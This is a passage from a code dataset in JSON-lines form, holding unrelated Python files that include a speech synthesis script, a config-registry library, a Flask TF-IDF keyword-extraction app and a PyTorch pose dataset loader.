models.DateTimeField(default = timezone.now(),blank=True,null =True,verbose_name='測驗日期')\t\t\n\texam_score = models.IntegerField(blank=True,null =True,verbose_name='測驗分數')\t\t\n\t\n\tclass Meta:\n\t\tordering = ('-attend_class_date',)\t\n\t\n\tdef __str__(self):\n\t\treturn self.subject","sub_path":"mfg_site/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"222636780","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : train-duration.py\n@Date : 2021/01/05, Tue\n@Author : Atomicoo\n@Version : 1.0\n@Contact : atomicoo95@gmail.com\n@License : (C)Copyright 2020-2021, ShiGroup-NLP-XMU\n@Desc : Synthetize sentences into speech.\n'''\n\n__author__ = 'Atomicoo'\n\nimport argparse\nimport os\nimport os.path as osp\nimport time\nfrom scipy.io.wavfile import write\n\nimport torch\nfrom utils.hparams import HParam\nfrom utils.transform import StandardNorm\nfrom helpers.synthesizer import Synthesizer\nimport vocoder.models\nfrom vocoder.layers import PQMF\nfrom utils.audio import dynamic_range_decompression\nfrom datasets.dataset import TextProcessor\nfrom models import ParallelText2Mel\n\nfrom utils.utils import select_device, get_last_chkpt_path\ntry:\n from helpers.manager import GPUManager\nexcept ImportError as err:\n print(err); gm = None\nelse:\n gm = GPUManager()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--batch_size\", default=8, type=int, help=\"Batch size\")\n parser.add_argument(\"--checkpoint\", default=None, type=str, help=\"Checkpoint file path\")\n parser.add_argument(\"--melgan_checkpoint\", default=None, type=str, help=\"Checkpoint file path of melgan\")\n parser.add_argument(\"--input_texts\", default=None, type=str, help=\"Input text file path\")\n parser.add_argument(\"--outputs_dir\", default=None, type=str, help=\"Output wave file directory\")\n parser.add_argument(\"--device\", default=None, help=\"cuda device or cpu\")\n parser.add_argument(\"--name\", default=\"parallel\", type=str, help=\"Append to logdir name\")\n parser.add_argument(\"--config\", default=None, type=str, help=\"Config file path\")\n args = parser.parse_args()\n\n if torch.cuda.is_available():\n index = args.device if args.device else str(0 if gm is None else gm.auto_choice())\n else:\n index = 'cpu'\n device = select_device(index)\n\n hparams = HParam(args.config) \\\n if args.config else HParam(osp.join(osp.abspath(os.getcwd()), \"config\", \"default.yaml\"))\n\n logdir = osp.join(hparams.trainer.logdir, f\"%s-%s\" % (hparams.data.dataset, args.name))\n checkpoint = args.checkpoint or get_last_chkpt_path(logdir)\n\n normalizer = StandardNorm(hparams.audio.spec_mean, hparams.audio.spec_std)\n processor = TextProcessor(hparams.text)\n text2mel = ParallelText2Mel(hparams.parallel)\n text2mel.eval()\n\n synthesizer = Synthesizer(\n model=text2mel,\n checkpoint=checkpoint,\n processor=processor,\n normalizer=normalizer,\n device=device\n )\n\n print('Synthesizing...')\n since = time.time()\n text_file = args.input_texts or hparams.synthesizer.inputs_file_path\n with open(text_file, 'r', encoding='utf-8') as fr:\n texts = fr.read().strip().split('\\n')\n melspecs = synthesizer.inference(texts)\n print(f\"Inference {len(texts)} spectrograms, total elapsed {time.time()-since:.3f}s. 
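# A hedged sketch of the mel rescaling performed below for the MelGAN
# vocoder: undo the training-time dynamic-range compression (assumed here to
# be natural log, per the usual ParallelWaveGAN convention), move to log10,
# then z-normalize with the checkpoint's per-bin statistics.
import torch

def rescale_mel(mel, mu, var):
    log10_mel = torch.log10(torch.exp(mel))   # ln-compressed -> log10 domain
    mu = mu.unsqueeze(1)                      # (n_mels,) -> (n_mels, 1) for broadcasting
    sigma = torch.sqrt(var).unsqueeze(1)
    return (log10_mel - mu) / sigma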
Done.\")\n\n vocoder_checkpoint = args.melgan_checkpoint or \\\n osp.join(hparams.trainer.logdir, f\"{hparams.data.dataset}-melgan\", hparams.melgan.checkpoint)\n ckpt = torch.load(vocoder_checkpoint, map_location=device)\n\n # Ref: https://github.com/kan-bayashi/ParallelWaveGAN/issues/169\n decompressed = dynamic_range_decompression(melspecs)\n decompressed_log10 = torch.log10(decompressed)\n mu = torch.tensor(ckpt['stats']['mu']).to(device).unsqueeze(1)\n var = torch.tensor(ckpt['stats']['var']).to(device).unsqueeze(1)\n sigma = torch.sqrt(var)\n melspecs = (decompressed_log10 - mu) / sigma\n\n Generator = getattr(vocoder.models, ckpt['gtype'])\n\n vocoder = Generator(**ckpt['config']).to(device)\n vocoder.remove_weight_norm()\n if ckpt['config']['out_channels'] > 1:\n vocoder.pqmf = PQMF().to(device)\n vocoder.load_state_dict(ckpt['model'])\n\n if ckpt['config']['out_channels'] > 1:\n waves = vocoder.pqmf.synthesis(vocoder(melspecs)).squeeze(1)\n else:\n waves = vocoder(melspecs).squeeze(1)\n print(f\"Generate {len(texts)} audios, total elapsed {time.time()-since:.3f}s. Done.\")\n\n print('Saving audio...')\n outputs_dir = args.outputs_dir or hparams.synthesizer.outputs_dir\n os.makedirs(outputs_dir, exist_ok=True)\n for i, wav in enumerate(waves, start=1):\n wav = wav.cpu().detach().numpy()\n filename = osp.join(outputs_dir, f\"{time.strftime('%Y-%m-%d')}_{i:03d}.wav\")\n write(filename, hparams.audio.sampling_rate, wav)\n print(f\"Audios saved to {outputs_dir}. Done.\")\n\n print(f'Done. ({time.time()-since:.3f}s)')\n \n","sub_path":"synthesize.wave.py","file_name":"synthesize.wave.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"645493347","text":"class Solution(object):\n def sumOddLengthSubarrays(self, arr):\n \"\"\"\n :type arr: List[int]\n :rtype: int\n \"\"\"\n pref = [0]\n for i in arr:\n pref.append(pref[-1]+i)\n ans = 0\n for i in range((len(arr)+1)//2):\n step = 2*i+1\n for j in range(len(pref)-step):\n ans += (pref[j+step]-pref[j])\n return ans\n# Runtime: 44 ms, faster than 82.47% of Python online submissions for Sum of All Odd Length Subarrays.\n# Memory Usage: 13.4 MB, less than 44.20% of Python online submissions for Sum of All Odd Length Subarrays.","sub_path":"1588. Sum of All Odd Length Subarrays.py","file_name":"1588. 
Sum of All Odd Length Subarrays.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"427581455","text":"Bbuf = (\t'\\x81' \t\t\t# Message Type 'B'\n\t+ chr(0b01010011) \t# Status 1, No lock, Same/Both, fork mode off, transmitter on\n\t+ chr(0b01000100) \t# Status 2, No fast speed locked, faster enabled, no low volt\n\t+ '\\x31\\x31\\x31' \t# Patrol Speed, 111\n\t+ '\\x32\\x32\\x32' \t# Locked Speed, 222\n\t+ '\\x33\\x33\\x33' \t# Faster speed, 333\n\t+ '\\x34\\x34\\x34' \t# Target speed, 444\n\t+ '\\x0D'\t\t# Carriage return\n\t)\n\n","sub_path":"speedsensor/testBsentence.py","file_name":"testBsentence.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"390461599","text":"#!/usr/bin/python\n\nimport sys\nimport re\n\npid = int(sys.argv[1])\nstack_alloc_size = int(sys.argv[2])\ncounter = int(sys.argv[3])\n\n\nMAPS_LINE_RE = re.compile(r\"\"\"\n (?P[0-9a-f]+)-(?P[0-9a-f]+)\\s+ # Address\n (?P\\S+)\\s+ # Permissions\n (?P[0-9a-f]+)\\s+ # Map offset\n (?P\\S+)\\s+ # Device node\n (?P\\d+)\\s+ # Inode\n (\\[stack\\].*)\\s+ # Pathname\n\"\"\", re.VERBOSE)\n\n\nwith open(\"/proc/%d/maps\" % pid) as fd:\n for line in fd:\n m = MAPS_LINE_RE.match(line)\n if not m:\n continue\n addr_start, addr_end, perms, offset, dev, inode, pathname = m.groups()\n stack_size = int(addr_end, 16) - int(addr_start, 16)\n print(\"{},{},{}\".format(counter, stack_alloc_size, stack_size))\n","sub_path":"08-analysis/stack-alloc-maps/parse-maps.py","file_name":"parse-maps.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"487292413","text":"__version__ = \"0.0.7\"\n\nimport oyaml as yaml\nimport types\nimport copy\nfrom .template import expand, gather_hparams_from_config, construct_expname, _contains_hparam_key, _strip_off_hparam_key\nimport traceback\nfrom pprint import pprint\nimport functools\nfrom reprlib import repr\nimport inspect\n\nMODULES = {}\n\n\nclass Configurable:\n def __init__(self, f, *args, **kwargs):\n self.f = f\n self.initial_args = args\n self.initial_kwargs = kwargs\n\n def __call__(self, *new_args, **new_kwargs):\n new_kwargs = dict() if new_kwargs is None else new_kwargs\n\n if len(new_kwargs) > 0:\n updated_kwargs = copy.copy(self.initial_kwargs)\n updated_kwargs.update(new_kwargs)\n else:\n updated_kwargs = self.initial_kwargs\n\n return self.f(*new_args, *self.initial_args, **updated_kwargs)\n\n\ndef check():\n return {\n \"num_modules\": len(MODULES),\n \"keys\": list(MODULES)\n }\n\n\ndef check_registered():\n print(\"################################################################\")\n print(\"Printing registered modules: \")\n for module_key, module in sorted(MODULES.items(), key=lambda kv: kv[0]):\n print(f\"{module_key:24}{module}\")\n print(\"################################################################\")\n\n\ndef quick_register(module):\n name = module.__name__\n if name in MODULES:\n try:\n is_same_module = inspect.getsourcefile(module) == inspect.getsourcefile(MODULES[name])\n except:\n print(\"Make sure module {} is not being overloaded!\".format(name))\n is_same_module = module.__dict__.keys() == MODULES[name].__dict__.keys()\n if is_same_module:\n print(\"The module {} is already registered. \".format(name))\n else:\n print(\"A different module with name {} is already registered. 
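# A minimal, self-contained sketch of the register/get pattern used by the
# spaghettini record around here, without its duplicate-registration checks;
# REGISTRY stands in for the module-level MODULES dict.
REGISTRY = {}

def register(name=None):
    def core(module):
        REGISTRY[name or module.__name__] = module
        return module
    return core

@register()
def linear(x, a=1, b=0):
    return a * x + b

assert REGISTRY["linear"](2, a=3) == 6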
\".format(name))\n print(f\"Module repr is {MODULES[name].__repr__}\")\n raise NameError\n try:\n MODULES[name] = module\n except Exception as e:\n print(\"Exception: \\n{}\".format(e))\n print(\"Traceback: \\n{}\".format(traceback.print_exc()))\n print(\"Message: Couldn't find module named {} to load\".format(name))\n\n return module\n\n\ndef register(name=None):\n assert name not in MODULES, \"The module with {} is already registered. \".format(name)\n names = [name]\n\n def core(module):\n name = names[0]\n if name is None:\n name = module.__name__\n MODULES[name] = module\n return module\n\n return core\n\n\ndef get(name):\n try:\n return MODULES[name]\n except Exception as e:\n print(\"\\nSpaghettini Message: Module '{}' not registered. \\n\".format(name))\n raise\n\n\ndef configure(d, record_config=False, verbose=False):\n if type(d) == dict:\n # Strip off the hparam string from the key, if it exists.\n cleaned_d = dict()\n for key, value in d.items():\n if _contains_hparam_key(key):\n key = _strip_off_hparam_key(key)\n cleaned_d[key] = value\n d = cleaned_d\n\n new_d = {}\n for key, value in d.items():\n if key.startswith(\"[\") and key.endswith(\"]\"):\n for k, v in value.items():\n assert k not in new_d\n new_d[k] = v\n else:\n new_d[key] = value\n d = new_d\n\n assert \"\" in d, d\n m = get(d[\"\"])\n\n def core(*args, **kwargs):\n configure_fn = functools.partial(configure, record_config=record_config, verbose=verbose)\n extra_kwargs = {k: configure_fn(d[k]) for k in filter(lambda x:\n (not x.endswith(\">\") and not x.startswith(\"<\")), d)}\n if \"\" in d:\n extra_args = tuple(map(configure_fn, d[\"\"]))\n else:\n extra_args = tuple()\n try:\n # v = m(*args, *extra_args, **kwargs, **extra_kwargs)\n v = Configurable(f=m, *args, *extra_args, **kwargs, **extra_kwargs)\n except Exception as e:\n print(e)\n print(\"\\nException occured while loading {}.\\n\".format(d[\"\"]))\n raise\n\n if record_config:\n v.__config__ = d\n if verbose:\n print(\">>>> Instantiating module: {}\".format(m))\n print(\"Arguments:\")\n for i, arg in enumerate(tuple(args + extra_args)):\n print(\"\\tArgument {}: {}\".format(i, arg))\n print(\"Keyword arguments:\")\n for curr_key, curr_value in sorted(dict(**kwargs, **extra_kwargs).items(), key=lambda kv: kv[0]):\n print(\"\\tKey: {}\\n\\t\\t Value: {}\".format(curr_key, repr(curr_value)))\n print(\"<<<<\")\n return v\n\n if \"\" in d and d[\"\"]:\n return core()()\n return core()\n if type(d) == list:\n return list(map(configure, d))\n return d\n\n\ndef load(path, gather_hparams=False, verbose=False, record_config=True):\n if path.endswith(\"yaml\"):\n with open(path, \"r\") as f:\n x = yaml.safe_load(f)\n if verbose:\n print(\">>>>>>>> Configuring from '{}'. \".format(path))\n\n # Configure the modules.\n configured = configure(x, record_config=record_config, verbose=verbose)\n\n # Gather the hyperparameters.\n hparams_dict = dict()\n gather_hparams_from_config(x, hparams_dict)\n\n # Construct experiment name.\n exp_name = construct_expname(hparams_dict)\n\n # Return.\n return configured, exp_name if not gather_hparams else (configured, exp_name, hparams_dict)\n\n return None\n\n\ndef clear_registered_modules():\n print(\"This function is not debugged yet. 
\")\n MODULES = dict()\n","sub_path":"spaghettini/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"304589173","text":"import matplotlib.pyplot as plt\r\nimport os\r\nfrom torchvision import transforms, utils\r\nimport torch\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom utils.utils_file import get_cur_time_stamp, create_folder\r\n\r\ndef compute_differentiable_params(net):\r\n return sum(p.numel() for p in net.parameters() if p.requires_grad)\r\n\r\ndef convert_Relight_latent_light(latent_feature):\r\n \"\"\" Convert n x 6 x 16 x 16 -> n x 3 x 16 x 32 \"\"\"\r\n # torch image: C X H X W\r\n batch_size, C, H, W = latent_feature.size()\r\n latent_feature = torch.reshape(latent_feature, (batch_size, 3, 16, 32)) # make sure it is right\r\n # print(latent_feature.size())\r\n return latent_feature\r\n\r\ndef show_batch(sample_batch, out_file=None):\r\n grid = utils.make_grid(sample_batch)\r\n plt.figure(figsize=(30,20))\r\n plt.imshow(grid.detach().cpu().numpy().transpose((1,2,0)))\r\n\r\n if not out_file is None:\r\n print('try save ', out_file)\r\n plt.savefig(out_file)\r\n\r\n plt.show()\r\n\r\ndef show_light_batch(light_batch):\r\n light_batch = convert_Relight_latent_light(light_batch)\r\n show_batch(light_batch)\r\n \r\ndef save_loss(figure_fname, train_loss, valid_loss):\r\n plt.plot(train_loss)\r\n plt.plot(valid_loss)\r\n plt.legend(['train_loss', 'valid_loss'])\r\n plt.savefig(figure_fname)\r\n\r\ndef save_model(output_folder, model, optimizer, epoch, best_loss, exp_name, hist_train_loss, hist_valid_loss, hist_lr, params):\r\n \"\"\" Save current best model into some folder \"\"\"\r\n create_folder(output_folder)\r\n\r\n cur_time_stamp = get_cur_time_stamp()\r\n output_fname = os.path.join(output_folder, exp_name + '_' + cur_time_stamp + \".pt\")\r\n\r\n tmp_model = model\r\n if params.multi_gpu and hasattr(tmp_model, 'module'):\r\n tmp_model = model.module\r\n\r\n torch.save({\r\n 'epoch': epoch,\r\n 'best_loss': best_loss,\r\n 'model_state_dict': tmp_model.state_dict(),\r\n 'optimizer_state_dict': optimizer.state_dict(),\r\n 'hist_train_loss': hist_train_loss,\r\n 'hist_valid_loss': hist_valid_loss,\r\n 'hist_lr':hist_lr,\r\n 'params':str(params)\r\n }, output_fname)\r\n return output_fname\r\n \r\ndef get_lr(optimizer):\r\n for param_group in optimizer.param_groups:\r\n return param_group['lr']\r\n\r\ndef set_lr(optimizer, lr):\r\n for param_group in optimizer.param_groups:\r\n param_group['lr'] = lr","sub_path":"utils/net_utils.py","file_name":"net_utils.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428645308","text":"class User:\n def __init__(self,name,email,account_number):\n self.name = name\n self.email = email\n self.account_number = account_number\n self.balance = 0\n def make_deposit(self,deposit_amount):\n if deposit_amount < 0:\n print(\"Please enter correct number.\")\n else:\n self.balance += deposit_amount\n print(f\"{self.name} has deposited {deposit_amount} into account successfully.\")\n return self\n def make_withdrawal(self, withdraw_amount):\n if self.balance < withdraw_amount:\n print(\"Withdraw exceeds balance and please check\")\n else:\n self.balance -= withdraw_amount\n print(f\"{self.name} has withdrawed {withdraw_amount} from account successfully.\")\n return self\n def display_user_balance(self):\n 
print(f\"User: {self.name}, Balance: {self.balance}\")\n def transfer_money(self, other_user, transfer_amount):\n if transfer_amount > self.balance:\n print(\"Transfer amount exceeds balance and please check.\")\n elif transfer_amount <= 0:\n print(\"Transfer amount can't be negative or zero.\")\n elif not other_user:\n print(\"User to be transfered doesn't exist. Please check username.\")\n else:\n self.balance -= transfer_amount\n other_user.balance += transfer_amount\n print(f\"{transfer_amount} has been transfered to {other_user.name} successfully.\")\n return self\n\nuser1 = User(\"Tom\",\"tom@gmail.com\",\"1234\")\nuser2 = User(\"John\",\"john@gmail.com\",\"5678\")\nuser3 = User(\"Amy\",\"amy@gmail.com\",\"91011\")\nuser1.make_deposit(1000).make_deposit(3000).make_deposit(4000).make_withdrawal(2000).display_user_balance()\nuser2.make_deposit(3000).make_deposit(2500).make_withdrawal(1300).display_user_balance()\nuser3.make_deposit(2000).make_withdrawal(500).make_withdrawal(1000).make_withdrawal(1500).display_user_balance()\nuser1.transfer_money(user3, 2000).display_user_balance()\nuser3.display_user_balance()","sub_path":"fundamentals/OOP/chaining_method.py","file_name":"chaining_method.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46175268","text":"import pandas as pd\nimport re\nimport json\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom flask import Flask, jsonify, request, render_template, redirect, url_for\n\napp = Flask(__name__)\n\n\ndef pre_process(text):\n \n # lowercase\n text=text.lower()\n \n #remove tags\n text=re.sub(\"\",\" <> \",text)\n \n # remove special characters and digits\n text=re.sub(\"(\\\\d|\\\\W)+\",\" \",text)\n \n return text\n \ndef get_stop_words(stop_file_path):\n \"\"\"load stop words \"\"\"\n \n with open(stop_file_path, 'r', encoding=\"utf-8\") as f:\n stopwords = f.readlines()\n stop_set = set(m.strip() for m in stopwords)\n return frozenset(stop_set) \n\ndef sort_coo(coo_matrix):\n tuples = zip(coo_matrix.col, coo_matrix.data)\n return sorted(tuples, key=lambda x: (x[1], x[0]), reverse=True)\n\ndef extract_topn_from_vector(feature_names, sorted_items, topn=10):\n \"\"\"get the feature names and tf-idf score of top n items\"\"\"\n \n #use only topn items from vector\n sorted_items = sorted_items[:topn]\n\n score_vals = []\n feature_vals = []\n\n for idx, score in sorted_items:\n fname = feature_names[idx]\n \n #keep track of feature name and its corresponding score\n score_vals.append(round(score, 3))\n feature_vals.append(feature_names[idx])\n\n #create a tuples of feature,score\n #results = zip(feature_vals,score_vals)\n results= {}\n for idx in range(len(feature_vals)):\n results[feature_vals[idx]]=score_vals[idx]\n \n return results\n\ndef get_keywords(idx):\n\n #generate tf-idf for the given document\n tf_idf_vector=tfidf_transformer.transform(cv.transform([docs_test[idx]]))\n\n #sort the tf-idf vectors by descending order of scores\n sorted_items=sort_coo(tf_idf_vector.tocoo())\n\n #extract only the top n; n here is 10\n keywords=extract_topn_from_vector(feature_names,sorted_items,10)\n \n return keywords\n\ndef print_results(idx,keywords):\n # now print the results\n print(\"\\n=====Title=====\")\n print(docs_title[idx])\n print(\"\\n=====Body=====\")\n print(docs_body[idx])\n print(\"\\n===Keywords===\")\n for k in keywords:\n print(k,keywords[k]) \n \ndef 
check_require_skills(keywords, skills):\n for k in keywords:\n for d in skills:\n if k == d:\n return True \n return False \n\n# read json into a dataframe\ndf_idf=pd.read_json(\"static/data/stackoverflow-data-idf.json\",lines=True)\n\n# print schema\nprint(\"Schema:\\n\\n\",df_idf.dtypes)\nprint(\"Number of questions,columns=\",df_idf.shape)\n\ndf_idf['text'] = df_idf['title'] + df_idf['body']\ndf_idf['text'] = df_idf['text'].apply(lambda x:pre_process(x))\n\n#show the first 'text'\ndf_idf['text'][2]\n\n#load a set of stop words\nstopwords=get_stop_words(\"static/resources/stopwords.txt\")\n\n#get the text column \ndocs=df_idf['text'].tolist()\n\n#create a vocabulary of words, \n#ignore words that appear in 85% of documents, \n#eliminate stop words\ncv=CountVectorizer(max_df=0.85,stop_words=stopwords)\nword_count_vector=cv.fit_transform(docs)\n\nword_count_vector.shape\n\ncv=CountVectorizer(max_df=0.85,stop_words=stopwords,max_features=10000)\nword_count_vector=cv.fit_transform(docs)\nword_count_vector.shape\n\nlist(cv.vocabulary_.keys())[:10]\n\nlist(cv.get_feature_names())[2000:2015]\n\ntfidf_transformer=TfidfTransformer(smooth_idf=True,use_idf=True)\ntfidf_transformer.fit(word_count_vector)\n\ntfidf_transformer.idf_\n\n# read test docs into a dataframe and concatenate title and body\ndf_test=pd.read_json(\"static/data/stackoverflow-test.json\",lines=True)\ndf_test['text'] = df_test['title'] + df_test['body']\ndf_test['text'] =df_test['text'].apply(lambda x:pre_process(x))\n\n# get test docs into a list\ndocs_test=df_test['text'].tolist()\ndocs_title=df_test['title'].tolist()\ndocs_body=df_test['body'].tolist()\n \n# you only needs to do this once\nfeature_names=cv.get_feature_names()\n\n# get the document that we want to extract keywords from\ndoc=docs_test[0]\n\n#generate tf-idf for the given document\ntf_idf_vector=tfidf_transformer.transform(cv.transform([doc]))\n\n#sort the tf-idf vectors by descending order of scores\nsorted_items=sort_coo(tf_idf_vector.tocoo())\n\n#extract only the top n; n here is 10\nkeywords=extract_topn_from_vector(feature_names,sorted_items,10)\n\n# now print the results\nprint(\"\\n=====Title=====\")\nprint(docs_title[0])\nprint(\"\\n=====Body=====\")\nprint(docs_body[0])\nprint(\"\\n===Keywords===\")\nfor k in keywords:\n print(k,keywords[k])\n\n\n@app.route('/check', methods=['POST'])\ndef get_require_workers():\n global df_test\n global docs_test\n global docs_title\n global docs_body\n #get request with task description\n title = request.form['Title']\n body = request.form['Body']\n #Update data & get keywords\n with open(\"static/data/stackoverflow-test.json\", mode='r+') as feedsjson:\n feeds = json.load(feedsjson)\n feeds[\"body\"] = body\n feeds[\"title\"] = title\n feedsjson.seek(0)\n feedsjson.write(json.dumps(feeds))\n feedsjson.truncate()\n df_test=pd.read_json(\"static/data/stackoverflow-test.json\",lines=True)\n df_test['text'] = df_test['title'] + df_test['body']\n df_test['text'] =df_test['text'].apply(lambda x:pre_process(x))\n\n # get test docs into a list\n docs_test=df_test['text'].tolist()\n docs_title=df_test['title'].tolist()\n docs_body=df_test['body'].tolist()\n \n idx=0\n keywords=get_keywords(idx)\n print_results(idx,keywords)\n #keywords dictionary for every profession\n data_scientist_words = [\"machine\", \"learning\", \"statistics\", \"algorithms\", \"analyse\"]\n backend_words = [\"server\", \"database\", \"sql\", \"nosql\", \"storage\"]\n frontend_words = [\"web\", \"visualization\", \"form\", \"site\", \"platform\"]\n 
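# A hedged sketch of the TF-IDF keyword extraction the ml.py record around
# here builds from CountVectorizer + TfidfTransformer; sklearn's
# TfidfVectorizer fuses the two steps. get_feature_names_out needs
# scikit-learn >= 1.0 (older releases call it get_feature_names).
from sklearn.feature_extraction.text import TfidfVectorizer

def top_keywords(corpus, doc, topn=10):
    vec = TfidfVectorizer(max_df=0.85, max_features=10000)
    vec.fit(corpus)
    scores = vec.transform([doc]).toarray()[0]
    names = vec.get_feature_names_out()
    order = scores.argsort()[::-1][:topn]
    return {names[i]: round(float(scores[i]), 3) for i in order if scores[i] > 0}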
mobile_words = [\"ios\", \"android\", \"application\", \"mobile\", \"smartphone\", \"iphone\"]\n design_words = [\"visualization\", \"interface\", \"UI\", \"UX\", \"friendly\"]\n #check matches\n data_scientist = check_require_skills(keywords, data_scientist_words)\n backend = check_require_skills(keywords, backend_words)\n frontend = check_require_skills(keywords, frontend_words)\n mobile = check_require_skills(keywords, mobile_words)\n design = check_require_skills(keywords, design_words)\n\n return render_template('requirements.html', title=title, body=body, data_scientist=data_scientist, backend=backend, frontend=frontend, mobile=mobile, design=design)\n\n@app.route(\"/\")\ndef startpage():\n return render_template('index.html')\n\n \nif __name__ == '__main__':\n app.run(debug=True, host='localhost')\n\n","sub_path":"ml/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":6639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"237691312","text":"from __future__ import division\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision.transforms import Normalize\nimport numpy as np\nimport cv2\nfrom os.path import join\n\nimport config\nimport constants\nfrom utils.imutils import crop, flip_img, flip_pose, flip_kp, transform, rot_aa\n\nclass BaseJointsDataset(Dataset):\n \"\"\"\n Base Dataset Class - Handles data loading and augmentation.\n Able to handle heterogeneous datasets (different annotations available for different datasets).\n You need to update the path to each dataset in utils/config.py.\n \"\"\"\n\n def __init__(self, options, cfg, dataset, ignore_3d=False, use_augmentation=True, is_train=True):\n super(BaseJointsDataset, self).__init__()\n self.dataset = dataset\n self.is_train = is_train\n self.options = options\n self.img_dir = config.DATASET_FOLDERS[dataset]\n self.normalize_img = Normalize(mean=constants.IMG_NORM_MEAN, std=constants.IMG_NORM_STD)\n self.data = np.load(config.DATASET_FILES[is_train][dataset])\n self.imgname = self.data['imgname']\n self.num_joints = cfg.MODEL.NUM_JOINTS\n\n self.target_type = cfg.MODEL.TARGET_TYPE\n self.image_size = np.array(cfg.MODEL.IMAGE_SIZE)\n self.heatmap_size = np.array(cfg.MODEL.HEATMAP_SIZE)\n self.sigma = cfg.MODEL.SIGMA\n self.use_different_joints_weight = cfg.LOSS.USE_DIFFERENT_JOINTS_WEIGHT\n self.joints_weight = 1\n\n # self.target_type = 'gaussian'\n # self.heatmap_size = [64, 64]\n # self.sigma = 2\n # self.use_different_joints_weight = True\n # self.joints_weight = 1\n\n # Get paths to gt masks, if available\n try:\n self.maskname = self.data['maskname']\n except KeyError:\n pass\n try:\n self.partname = self.data['partname']\n except KeyError:\n pass\n\n # Bounding boxes are assumed to be in the center and scale format\n self.scale = self.data['scale']\n self.center = self.data['center']\n \n # If False, do not do augmentation\n self.use_augmentation = use_augmentation\n \n # Get gt SMPL parameters, if available\n try:\n self.pose = self.data['pose'].astype(np.float)\n self.betas = self.data['shape'].astype(np.float)\n if 'has_smpl' in self.data:\n self.has_smpl = self.data['has_smpl']\n else:\n self.has_smpl = np.ones(len(self.imgname))\n except KeyError:\n self.has_smpl = np.zeros(len(self.imgname))\n if ignore_3d:\n self.has_smpl = np.zeros(len(self.imgname))\n \n # Get gt 3D pose, if available\n try:\n self.pose_3d = self.data['S']\n self.has_pose_3d = 1\n except KeyError:\n self.has_pose_3d = 0\n if ignore_3d:\n self.has_pose_3d = 0\n 
\n # Get 2D keypoints\n try:\n keypoints_gt = self.data['part']\n except KeyError:\n keypoints_gt = np.zeros((len(self.imgname), 24, 3))\n try:\n keypoints_openpose = self.data['openpose']\n except KeyError:\n keypoints_openpose = np.zeros((len(self.imgname), 25, 3))\n self.keypoints = np.concatenate([keypoints_openpose, keypoints_gt], axis=1)\n\n # Get gender data, if available\n try:\n gender = self.data['gender']\n self.gender = np.array([0 if str(g) == 'm' else 1 for g in gender]).astype(np.int32)\n except KeyError:\n self.gender = -1*np.ones(len(self.imgname)).astype(np.int32)\n \n self.length = self.scale.shape[0]\n\n def augm_params(self):\n \"\"\"Get augmentation parameters.\"\"\"\n flip = 0 # flipping\n pn = np.ones(3) # per channel pixel-noise\n rot = 0 # rotation\n sc = 1 # scaling\n if self.is_train:\n # We flip with probability 1/2\n if np.random.uniform() <= 0.5:\n flip = 1\n \n # Each channel is multiplied with a number \n # in the area [1-opt.noiseFactor,1+opt.noiseFactor]\n pn = np.random.uniform(1-self.options.noise_factor, 1+self.options.noise_factor, 3)\n \n # The rotation is a number in the area [-2*rotFactor, 2*rotFactor]\n rot = min(2*self.options.rot_factor,\n max(-2*self.options.rot_factor, np.random.randn()*self.options.rot_factor))\n \n # The scale is multiplied with a number\n # in the area [1-scaleFactor,1+scaleFactor]\n sc = min(1+self.options.scale_factor,\n max(1-self.options.scale_factor, np.random.randn()*self.options.scale_factor+1))\n # but it is zero with probability 3/5\n if np.random.uniform() <= 0.6:\n rot = 0\n \n return flip, pn, rot, sc\n\n def rgb_processing(self, rgb_img, center, scale, rot, flip, pn):\n \"\"\"Process rgb image and do augmentation.\"\"\"\n rgb_img = crop(rgb_img, center, scale, \n [constants.IMG_RES, constants.IMG_RES], rot=rot)\n # flip the image \n if flip:\n rgb_img = flip_img(rgb_img)\n # in the rgb image we add pixel noise in a channel-wise manner\n rgb_img[:,:,0] = np.minimum(255.0, np.maximum(0.0, rgb_img[:,:,0]*pn[0]))\n rgb_img[:,:,1] = np.minimum(255.0, np.maximum(0.0, rgb_img[:,:,1]*pn[1]))\n rgb_img[:,:,2] = np.minimum(255.0, np.maximum(0.0, rgb_img[:,:,2]*pn[2]))\n # (3,224,224),float,[0,1]\n rgb_img = np.transpose(rgb_img.astype('float32'),(2,0,1))/255.0\n return rgb_img\n\n def j2d_processing(self, kp, center, scale, r, f):\n \"\"\"Process gt 2D keypoints and apply all augmentation transforms.\"\"\"\n nparts = kp.shape[0]\n for i in range(nparts):\n kp[i,0:2] = transform(kp[i,0:2]+1, center, scale, \n [constants.IMG_RES, constants.IMG_RES], rot=r)\n # convert to normalized coordinates\n kp[:,:-1] = 2.*kp[:,:-1]/constants.IMG_RES - 1.\n # flip the x coordinates\n if f:\n kp = flip_kp(kp)\n kp = kp.astype('float32')\n return kp\n\n def j3d_processing(self, S, r, f):\n 